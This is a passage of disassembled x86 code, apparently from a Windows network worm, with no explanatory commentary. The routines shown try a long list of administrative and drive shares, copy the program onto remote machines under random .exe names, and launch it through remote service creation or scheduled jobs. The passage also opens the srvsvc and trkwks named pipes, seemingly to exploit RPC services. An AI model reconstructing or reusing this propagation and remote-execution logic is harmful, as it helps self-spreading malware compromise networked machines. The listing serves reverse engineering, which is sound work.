push esi
push esi
push edi
call dword_456DB0 ; StartServiceA
test eax, eax
jz short loc_40530F
push ebx
call dword_456E30 ; DeleteService
push [ebp+var_4]
call dword_456DC4 ; CloseServiceHandle
push ebx
call dword_456DC4 ; CloseServiceHandle
push edi
jmp short loc_4052BB
; ---------------------------------------------------------------------------
loc_40530F: ; CODE XREF: sub_4051C0+111�j
; sub_4051C0+126�j ...
push ebx
call dword_456E30 ; DeleteService
push [ebp+var_4]
call dword_456DC4 ; CloseServiceHandle
push ebx
loc_405320: ; CODE XREF: sub_4051C0+CD�j
call dword_456DC4 ; CloseServiceHandle
loc_405326: ; CODE XREF: sub_4051C0+26�j
xor eax, eax
loc_405328: ; CODE XREF: sub_4051C0+104�j
pop edi
pop esi
pop ebx
leave
retn
sub_4051C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40532D proc near ; CODE XREF: sub_4053EE+4EC�p
var_3AC = byte ptr -3ACh
var_1A4 = byte ptr -1A4h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3ACh
push ebx
push edi
lea eax, [ebp+var_1A4]
push 190h
mov edi, dword_437180
push eax
push 0FFFFFFFFh
xor ebx, ebx
push [ebp+arg_0]
mov [ebp+var_4], ebx
push ebx
push ebx
call edi ; dword_437180
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_1A4]
push eax
call dword_456E0C
test eax, eax
jnz short loc_4053DF
mov ecx, [ebp+var_4]
cmp ecx, ebx
jz short loc_4053DF
mov eax, [ecx]
push esi
push 3Ch
xor edx, edx
pop esi
div esi
xor edx, edx
push 10h
push ebx
sub eax, [ecx+18h]
mov ecx, 5A0h
inc eax
inc eax
div ecx
lea eax, [ebp+var_14]
push eax
mov esi, edx
call sub_429690
imul esi, 0EA60h
add esp, 0Ch
lea eax, [ebp+var_3AC]
mov [ebp+var_14], esi
push 208h
push eax
push 0FFFFFFFFh
push [ebp+arg_4]
push ebx
push ebx
call edi ; dword_437180
lea eax, [ebp+var_3AC]
mov [ebp+var_8], eax
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_1A4]
push eax
call dword_456E64
test eax, eax
pop esi
jnz short loc_4053DF
inc ebx
loc_4053DF: ; CODE XREF: sub_40532D+3E�j
; sub_40532D+45�j ...
push [ebp+var_4]
call dword_456FC0
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_40532D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053EE proc near ; CODE XREF: sub_405936+34�p
var_514 = byte ptr -514h
var_410 = byte ptr -410h
var_30C = byte ptr -30Ch
var_20C = byte ptr -20Ch
var_108 = byte ptr -108h
var_104 = dword ptr -104h
var_F8 = dword ptr -0F8h
var_F4 = dword ptr -0F4h
var_EC = dword ptr -0ECh
var_E8 = dword ptr -0E8h
var_E4 = dword ptr -0E4h
var_E0 = dword ptr -0E0h
var_DC = dword ptr -0DCh
var_D8 = dword ptr -0D8h
var_D4 = dword ptr -0D4h
var_D0 = dword ptr -0D0h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_C0 = dword ptr 0C8h
arg_C8 = dword ptr 0D0h
arg_D0 = dword ptr 0D8h
push ebp
mov ebp, esp
sub esp, 514h
push ebx
push esi
push edi
call sub_427F4E
xor edi, edi
push 20h
lea eax, [ebp+var_108]
push edi
push eax
call sub_429690
mov eax, [ebp+arg_8]
add esp, 0Ch
mov [ebp+var_F4], eax
lea eax, [ebp+var_108]
push edi
mov [ebp+var_104], 1
push [ebp+arg_0]
mov [ebp+var_F8], edi
mov [ebp+var_EC], edi
push [ebp+arg_4]
push eax
call dword_456FE0
test eax, eax
jnz loc_405922
push [ebp+arg_0]
mov esi, 104h
lea eax, [ebp+var_514]
push offset aAdministratorS ; "Administrator\\\\%s$"
push esi
push eax
call sub_429AEE
lea eax, [ebp+var_514]
add esp, 10h
mov [ebp+var_D0], eax
mov eax, offset aCWindowsSystem ; "C:\\WINDOWS\\system32$"
mov [ebp+var_E8], offset byte_454A34
mov [ebp+var_E4], offset aAdmin_2 ; "ADMIN$"
mov [ebp+var_E0], offset aIpc ; "IPC$"
mov [ebp+var_DC], offset aPrint ; "PRINT$"
mov [ebp+var_D8], offset aS_7 ; "S$"
mov [ebp+var_D4], offset aNetlogon ; "NETLOGON$"
mov [ebp+var_CC], offset aB ; "B$"
mov [ebp+var_C8], offset aC_0 ; "C$"
mov [ebp+var_C4], offset aD ; "D$"
mov [ebp+var_C0], offset aE_1 ; "E$"
mov [ebp+var_BC], offset aF ; "F$"
mov [ebp+var_B8], offset aG ; "G$"
mov [ebp+var_B4], offset asc_43E014 ; "H$"
mov [ebp+var_B0], offset aI_1 ; "I$"
mov [ebp+var_AC], offset aJ ; "J$"
mov [ebp+var_A8], offset aK_0 ; "K$"
mov [ebp+var_A4], offset asc_43E004 ; "L$"
mov [ebp+var_A0], offset aM_3 ; "M$"
mov [ebp+var_9C], offset aN ; "N$"
mov [ebp+var_98], offset aO ; "O$"
mov [ebp+var_94], offset aP_3 ; "P$"
mov [ebp+var_90], offset aQ_0 ; "Q$"
mov [ebp+var_8C], offset aR ; "R$"
mov [ebp+var_88], offset aT ; "T$"
mov [ebp+var_84], offset aU_0 ; "U$"
mov [ebp+var_80], offset aV ; "V$"
mov [ebp+var_7C], offset aW ; "W$"
mov [ebp+var_78], offset asc_43DFDC ; "X$"
mov [ebp+var_74], offset aY_0 ; "Y$"
mov [ebp+var_70], offset aZ_1 ; "Z$"
mov [ebp+var_6C], eax
mov [ebp+var_68], offset aCWinnt ; "C:\\WINNT$"
mov [ebp+var_64], offset aDWindows ; "D:\\WINDOWS$"
mov [ebp+var_60], offset aCWinntSystem32 ; "C:\\WINNT\\system32$"
mov [ebp+var_5C], eax
mov [ebp+var_58], offset aDWinntSystem32 ; "D:\\WINNT\\system32$"
mov [ebp+var_54], offset aDWindowsSystem ; "D:\\WINDOWS\\system32$"
mov [ebp+var_50], offset aEWinntSystem32 ; "E:\\WINNT\\system32$"
mov [ebp+var_4C], offset aEWindowsSystem ; "E:\\WINDOWS\\system32$"
mov [ebp+var_48], offset aCDocume1Admini ; "C$\\DOCUME~1\\ADMINI~1\\"
mov [ebp+var_44], offset aDDocume1Admini ; "D$\\DOCUME~1\\ADMINI~1\\"
mov [ebp+var_40], offset aCDocume1Admi_0 ; "C$\\DOCUME~1\\ADMINI~1$"
mov [ebp+var_3C], offset aDDocume1Admi_0 ; "D$\\DOCUME~1\\ADMINI~1$"
mov [ebp+var_38], offset aAdministrado_1 ; "ADMINISTRADOR$"
mov [ebp+var_34], offset aAdministrato_1 ; "ADMINISTRATOR$"
mov [ebp+var_30], offset aPipe_0 ; "PIPE\\"
mov [ebp+var_2C], offset aPipe ; "PIPE$"
mov [ebp+var_28], offset aWindows_0 ; "WINDOWS$"
mov [ebp+var_24], offset aWinnt_0 ; "WINNT$"
mov [ebp+var_20], offset aMysql_0 ; "MYSQL$"
mov [ebp+var_1C], offset aMssql_0 ; "MSSQL$"
mov [ebp+var_18], offset aDrivec ; "drivec$"
mov [ebp+var_14], offset aBrowser ; "BROWSER$"
mov [ebp+var_10], offset aDevice0 ; "device0$"
mov [ebp+var_C], edi
call sub_429ACC
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
mov ebx, offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
idiv ecx
lea eax, [ebp+var_30C]
push edx
push offset dword_44399C
push ebx
push eax
call sub_429A33
add esp, 20h
lea eax, [ebp+var_410]
push esi
push eax
push 0
call dword_437070 ; GetModuleHandleA
push eax
call dword_437178 ; GetModuleFileNameA
and [ebp+var_4], 0
mov esi, offset aSSS_4 ; "%s\\%s\\%s"
loc_4056B0: ; CODE XREF: sub_4053EE+3E4�j
mov eax, [ebp+var_4]
lea ecx, [ebp+var_30C]
push ecx
mov eax, [ebp+eax*4+var_E8]
push eax
lea eax, [ebp+var_20C]
push [ebp+arg_8]
push esi
push eax
call sub_429A33
add esp, 14h
lea eax, [ebp+var_20C]
push eax
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4056F9
lea eax, [ebp+var_20C]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
loc_4056F9: ; CODE XREF: sub_4053EE+2F7�j
lea eax, [ebp+var_20C]
push 0
push eax
lea eax, [ebp+var_410]
push eax
call dword_437064 ; CopyFileA
test eax, eax
mov [ebp+var_8], eax
jnz loc_4057E2
call dword_43716C ; RtlGetLastWin32Error
cmp eax, 5
jnz loc_4057CB
lea eax, [ebp+var_20C]
push 0
push eax
call sub_42A5F0
pop ecx
test eax, eax
pop ecx
jnz loc_4057CB
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
lea eax, [ebp+var_30C]
push edx
push offset dword_44399C
push ebx
push eax
call sub_429A33
lea eax, [ebp+var_30C]
push eax
mov eax, [ebp+var_4]
push [ebp+eax*4+var_E8]
lea eax, [ebp+var_20C]
push [ebp+arg_8]
push esi
push eax
call sub_429A33
add esp, 34h
lea eax, [ebp+var_20C]
push 0
push eax
lea eax, [ebp+var_410]
push eax
call dword_437064 ; CopyFileA
test eax, eax
mov [ebp+var_8], eax
jnz short loc_4057E2
loc_4057CB: ; CODE XREF: sub_4053EE+335�j
; sub_4053EE+34D�j
inc [ebp+var_4]
cmp [ebp+var_4], 38h
jb loc_4056B0
cmp [ebp+var_8], 0
jz loc_405920
loc_4057E2: ; CODE XREF: sub_4053EE+326�j
; sub_4053EE+3DB�j
mov eax, [ebp+var_4]
lea ecx, [ebp+var_30C]
push ecx
push [ebp+arg_4]
mov eax, [ebp+eax*4+var_E8]
mov [ebp+var_4], eax
push [ebp+arg_0]
push [ebp+arg_8]
push eax
call sub_4051C0
add esp, 14h
test eax, eax
jz loc_4058D0
mov ebx, offset aSSSSSSCreateds ; "%s %s: -> [%s\\%s, %s/%s] (CreatedServic"...
loc_405815: ; CODE XREF: sub_4053EE+4FC�j
cmp [ebp+arg_D0], 0
mov edi, offset dword_43A357
mov esi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
jz short loc_405871
cmp [ebp+arg_C8], 0
jnz short loc_40587A
push offset byte_454A34
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
mov eax, offset aBlank ; "(Blank)"
jz short loc_40584B
mov eax, [ebp+arg_4]
loc_40584B: ; CODE XREF: sub_4053EE+458�j
push eax
mov eax, [ebp+arg_C0]
push [ebp+arg_0]
shl eax, 6
push [ebp+var_4]
add eax, edi
push [ebp+arg_8]
push eax
push esi
push ebx
push [ebp+arg_C]
push [ebp+arg_10]
call sub_41CD84
add esp, 24h
loc_405871: ; CODE XREF: sub_4053EE+438�j
cmp [ebp+arg_C8], 0
jz short loc_4058BA
loc_40587A: ; CODE XREF: sub_4053EE+441�j
push offset byte_454A34
push [ebp+arg_4]
call dword_437174 ; lstrcmpiA
test eax, eax
mov eax, offset aBlank ; "(Blank)"
jz short loc_405894
mov eax, [ebp+arg_4]
loc_405894: ; CODE XREF: sub_4053EE+4A1�j
push eax
mov eax, [ebp+arg_C0]
push [ebp+arg_0]
shl eax, 6
push [ebp+var_4]
add eax, edi
push [ebp+arg_8]
push eax
push esi
push ebx
push [ebp+arg_C]
push [ebp+arg_10]
call sub_41CD0E
add esp, 24h
loc_4058BA: ; CODE XREF: sub_4053EE+48A�j
mov eax, [ebp+arg_C0]
xor edi, edi
shl eax, 6
lea eax, dword_43A380[eax]
inc dword ptr [eax]
inc edi
jmp short loc_405922
; ---------------------------------------------------------------------------
loc_4058D0: ; CODE XREF: sub_4053EE+41C�j
lea eax, [ebp+var_30C]
push eax
push [ebp+arg_8]
call sub_40532D
pop ecx
test eax, eax
pop ecx
jz short loc_4058EF
mov ebx, offset aSSSSSSNetsched ; "%s %s: -> [%s\\%s, %s/%s] (NetSchedJobAd"...
jmp loc_405815
; ---------------------------------------------------------------------------
loc_4058EF: ; CODE XREF: sub_4053EE+4F5�j
lea eax, [ebp+var_20C]
push eax
call dword_43706C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_405913
lea eax, [ebp+var_20C]
push 80h
push eax
call dword_437068 ; SetFileAttributesA
loc_405913: ; CODE XREF: sub_4053EE+511�j
lea eax, [ebp+var_20C]
push eax
call dword_437060 ; DeleteFileA
loc_405920: ; CODE XREF: sub_4053EE+3EE�j
xor edi, edi
loc_405922: ; CODE XREF: sub_4053EE+5A�j
; sub_4053EE+4E0�j
push 1
push 1
push [ebp+arg_8]
call dword_456F90
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_4053EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405936 proc near ; CODE XREF: sub_405990+137�p
; sub_405990+1B4�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
cmp off_43CE08, 0
push ebx
push esi
push edi
jz short loc_405984
mov eax, offset off_43CE08
mov ebx, eax
loc_40594C: ; CODE XREF: sub_405936+4C�j
sub esp, 0C4h
lea esi, [ebp+arg_10]
push 31h
pop ecx
mov edi, esp
push [ebp+arg_C]
rep movsd
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
push [ebp+arg_0]
call sub_4053EE
add esp, 0D8h
cmp eax, 1
jz short loc_40598B
add ebx, 4
mov eax, ebx
cmp dword ptr [ebx], 0
jnz short loc_40594C
loc_405984: ; CODE XREF: sub_405936+D�j
xor eax, eax
loc_405986: ; CODE XREF: sub_405936+58�j
pop edi
pop esi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40598B: ; CODE XREF: sub_405936+42�j
xor eax, eax
inc eax
jmp short loc_405986
sub_405936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405990 proc near ; CODE XREF: sub_406D50+366�p
var_62C = byte ptr -62Ch
var_244 = byte ptr -244h
var_118 = byte ptr -118h
var_50 = byte ptr -50h
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 62Ch
push ebx
push esi
lea eax, [ebp+arg_8]
push edi
push eax
lea eax, [ebp+var_30]
xor ebx, ebx
push offset aS_0 ; "\\\\%s"
push eax
mov [ebp+var_4], ebx
mov [ebp+var_14], ebx
mov [ebp+var_1C], ebx
mov [ebp+var_18], ebx
call sub_429A33
add esp, 0Ch
lea eax, [ebp+var_62C]
push 3E8h
push eax
lea eax, [ebp+var_30]
push 0FFFFFFFFh
push eax
push ebx
push ebx
call dword_437180 ; MultiByteToWideChar
lea eax, [ebp+var_30]
mov [ebp+var_40], ebx
push eax
lea eax, [ebp+var_118]
push offset aSIpc ; "%s\\IPC$"
push eax
mov [ebp+var_34], ebx
mov [ebp+var_4C], ebx
call sub_429A33
lea eax, [ebp+var_118]
add esp, 0Ch
mov [ebp+var_3C], eax
mov eax, offset byte_454A34
push ebx
push eax
push eax
lea eax, [ebp+var_50]
push eax
call dword_456FE0
test eax, eax
jz short loc_405A30
push 1
lea eax, [ebp+var_118]
push ebx
push eax
call dword_456F90
xor eax, eax
jmp loc_405B64
; ---------------------------------------------------------------------------
loc_405A30: ; CODE XREF: sub_405990+87�j
; sub_405990+16E�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push 0FFFFFFFFh
push eax
push 2
lea eax, [ebp+var_62C]
push ebx
push eax
call dword_456E40
mov [ebp+var_C], eax
push 1
lea eax, [ebp+var_118]
push ebx
push eax
call dword_456F90
cmp [ebp+var_C], ebx
jz short loc_405A73
cmp [ebp+var_C], 0EAh
jnz short loc_405AE6
loc_405A73: ; CODE XREF: sub_405990+D8�j
mov eax, [ebp+var_4]
cmp eax, ebx
mov [ebp+var_10], eax
jz short loc_405AF7
cmp [ebp+var_14], ebx
mov [ebp+var_8], ebx
jbe short loc_405AE6
loc_405A85: ; CODE XREF: sub_405990+154�j
mov eax, [ebp+var_10]
cmp eax, ebx
jz short loc_405AE6
push ebx
push ebx
lea ecx, [ebp+var_244]
push 12Ch
push ecx
push 0FFFFFFFFh
push dword ptr [eax]
push ebx
push ebx
call dword_437074 ; WideCharToMultiByte
sub esp, 0C4h
lea eax, [ebp+var_30]
lea esi, [ebp+arg_8]
push 31h
pop ecx
mov edi, esp
push [ebp+arg_4]
rep movsd
push [ebp+arg_0]
push eax
lea eax, [ebp+var_244]
push eax
call sub_405936
add esp, 0D4h
cmp eax, 1
jz short loc_405AE6
add [ebp+var_10], 4
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+var_14]
jb short loc_405A85
loc_405AE6: ; CODE XREF: sub_405990+E1�j
; sub_405990+F3�j ...
cmp [ebp+var_4], ebx
jz short loc_405AF7
push [ebp+var_4]
call dword_456FC0
mov [ebp+var_4], ebx
loc_405AF7: ; CODE XREF: sub_405990+EB�j
; sub_405990+159�j
cmp [ebp+var_C], 0EAh
jz loc_405A30
cmp [ebp+var_4], ebx
jz short loc_405B12
push [ebp+var_4]
call dword_456FC0
loc_405B12: ; CODE XREF: sub_405990+177�j
cmp [ebp+var_C], 5
jnz short loc_405B61
cmp off_43CBE8, ebx
jz short loc_405B61
mov eax, offset off_43CBE8
mov [ebp+var_8], eax
loc_405B28: ; CODE XREF: sub_405990+1CF�j
sub esp, 0C4h
lea esi, [ebp+arg_8]
push 31h
pop ecx
mov edi, esp
push [ebp+arg_4]
rep movsd
push [ebp+arg_0]
lea ecx, [ebp+var_30]
push ecx
push dword ptr [eax]
call sub_405936
add esp, 0D4h
cmp eax, 1
jz short loc_405B61
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
cmp [eax], ebx
jnz short loc_405B28
loc_405B61: ; CODE XREF: sub_405990+186�j
; sub_405990+18E�j ...
xor eax, eax
inc eax
loc_405B64: ; CODE XREF: sub_405990+9B�j
pop edi
pop esi
pop ebx
leave
retn
sub_405990 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_405B69 proc near ; DATA XREF: .text:0043A004�o
jmp $+5
sub_405B69 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_405B6E proc near
mov eax, dword_43E0C8
add eax, 6
mov dword_455374, eax
retn
sub_405B6E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405B7C proc near ; CODE XREF: sub_405B7C+D0�p
; sub_405C6A+5E4�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_405B90
or [ebp+arg_7], 1
jmp short loc_405B94
; ---------------------------------------------------------------------------
loc_405B90: ; CODE XREF: sub_405B7C+C�j
and [ebp+arg_7], 0FEh
loc_405B94: ; CODE XREF: sub_405B7C+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+arg_20]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_405BB8
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+arg_14], ebx
mov [ebp+arg_C], ax
jmp short loc_405BCA
; ---------------------------------------------------------------------------
loc_405BB8: ; CODE XREF: sub_405B7C+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+arg_14], eax
mov [ebp+arg_2B], 1
loc_405BCA: ; CODE XREF: sub_405B7C+3A�j
movzx eax, [ebp+arg_C]
push eax
mov [ebp+var_4], eax
call sub_4296E8
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_405C63
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_429350
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call dword_437078 ; WriteFile
test eax, eax
jz short loc_405C5A
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_405C5A
push [ebp+arg_20]
call sub_429822
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_405C56
push 0
sub ebx, edi
push [ebp+arg_24]
add edi, esi
lea esi, [ebp+arg_4]
push ebx
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
rep movsd
call sub_405B7C
add esp, 2Ch
jmp short loc_405C65
; ---------------------------------------------------------------------------
loc_405C56: ; CODE XREF: sub_405B7C+B3�j
mov al, 1
jmp short loc_405C65
; ---------------------------------------------------------------------------
loc_405C5A: ; CODE XREF: sub_405B7C+9C�j
; sub_405B7C+A4�j
push [ebp+arg_20]
call sub_429822
pop ecx
loc_405C63: ; CODE XREF: sub_405B7C+61�j
xor al, al
loc_405C65: ; CODE XREF: sub_405B7C+D8�j
; sub_405B7C+DC�j
pop edi
pop esi
pop ebx
leave
retn
sub_405B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405C6A proc near ; CODE XREF: sub_406391+4F�p
var_60DC = byte ptr -60DCh
var_40DC = byte ptr -40DCh
var_20DC = byte ptr -20DCh
var_DC = byte ptr -0DCh
var_D8 = byte ptr -0D8h
var_D7 = byte ptr -0D7h
var_D6 = byte ptr -0D6h
var_D5 = byte ptr -0D5h
var_D4 = dword ptr -0D4h
var_D0 = word ptr -0D0h
var_CE = word ptr -0CEh
var_CC = dword ptr -0CCh
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = word ptr -0BCh
var_BA = byte ptr -0BAh
var_B8 = byte ptr -0B8h
var_A8 = dword ptr -0A8h
var_A4 = byte ptr -0A4h
var_94 = dword ptr -94h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = qword ptr -68h
var_60 = word ptr -60h
var_5C = byte ptr -5Ch
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_47 = byte ptr -47h
var_46 = byte ptr -46h
var_45 = byte ptr -45h
var_44 = dword ptr -44h
var_3E = word ptr -3Eh
var_3C = dword ptr -3Ch
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = qword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
arg_CC = dword ptr 0D4h
push ebp
mov ebp, esp
mov eax, 60DCh
call sub_429A90
mov eax, [ebp+arg_CC]
push ebx
push esi
xor ebx, ebx
lea esi, [eax+eax*4]
push edi
shl esi, 2
cmp byte_43E0B0[esi], bl
jz loc_405DD6
lea eax, [ebp+arg_8]
push offset dword_43AB8C
push eax
call sub_42A7F0
pop ecx
mov edi, 2000h
test eax, eax
pop ecx
jz short loc_405CF2
lea eax, [ebp+arg_8]
push eax
push offset aSIpc_0 ; "\\\\%s\\IPC$"
lea eax, [ebp+var_20DC]
push edi
push eax
call sub_429AEE
push 20h
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429690
lea eax, [ebp+var_20DC]
add esp, 1Ch
mov [ebp+var_7C], eax
mov eax, offset byte_454A34
push ebx
push eax
push eax
lea eax, [ebp+var_90]
push eax
call sub_428FFA
loc_405CF2: ; CODE XREF: sub_405C6A+41�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeTrkwks ; "\\\\%s\\pipe\\trkwks"
lea eax, [ebp+var_40DC]
push edi
push eax
call sub_429AEE
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_CC], eax
jnz loc_405DDB
lea eax, [ebp+arg_8]
push offset dword_43AB8C
push eax
call sub_42A7F0
pop ecx
test eax, eax
pop ecx
jz short loc_405D90
lea eax, [ebp+arg_8]
push eax
push offset aSIpc_0 ; "\\\\%s\\IPC$"
lea eax, [ebp+var_20DC]
push edi
push eax
call sub_429AEE
push 20h
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429690
lea eax, [ebp+var_20DC]
add esp, 1Ch
mov [ebp+var_7C], eax
mov eax, offset byte_454A34
push ebx
push eax
push eax
lea eax, [ebp+var_90]
push eax
call sub_428FFA
loc_405D90: ; CODE XREF: sub_405C6A+DF�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeSrvsvc ; "\\\\%s\\pipe\\srvsvc"
lea eax, [ebp+var_40DC]
push edi
push eax
call sub_429AEE
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_CC], eax
jnz short loc_405DDB
jmp loc_40638A
; ---------------------------------------------------------------------------
loc_405DD6: ; CODE XREF: sub_405C6A+24�j
mov edi, 2000h
loc_405DDB: ; CODE XREF: sub_405C6A+C7�j
; sub_405C6A+165�j
cmp byte_43E0B1[esi], bl
jz loc_405E85
lea eax, [ebp+arg_8]
push offset dword_43AB8C
push eax
call sub_42A7F0
pop ecx
test eax, eax
pop ecx
jz short loc_405E40
lea eax, [ebp+arg_8]
push eax
push offset aSIpc_0 ; "\\\\%s\\IPC$"
lea eax, [ebp+var_20DC]
push edi
push eax
call sub_429AEE
push 20h
lea eax, [ebp+var_90]
push ebx
push eax
call sub_429690
lea eax, [ebp+var_20DC]
add esp, 1Ch
mov [ebp+var_7C], eax
mov eax, offset byte_454A34
push ebx
push eax
push eax
lea eax, [ebp+var_90]
push eax
call sub_428FFA
loc_405E40: ; CODE XREF: sub_405C6A+18F�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeSrvsvc ; "\\\\%s\\pipe\\srvsvc"
lea eax, [ebp+var_40DC]
push edi
push eax
call sub_429AEE
add esp, 10h
lea eax, [ebp+var_40DC]
push ebx
push 40000000h
push 3
push ebx
push 3
push 0C0000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+arg_CC], eax
jz loc_40638A
loc_405E85: ; CODE XREF: sub_405C6A+177�j
push 48h
lea eax, [ebp+var_D8]
push ebx
push eax
call sub_429690
push 10h
mov [ebp+var_D8], 5
pop eax
mov [ebp+var_D7], bl
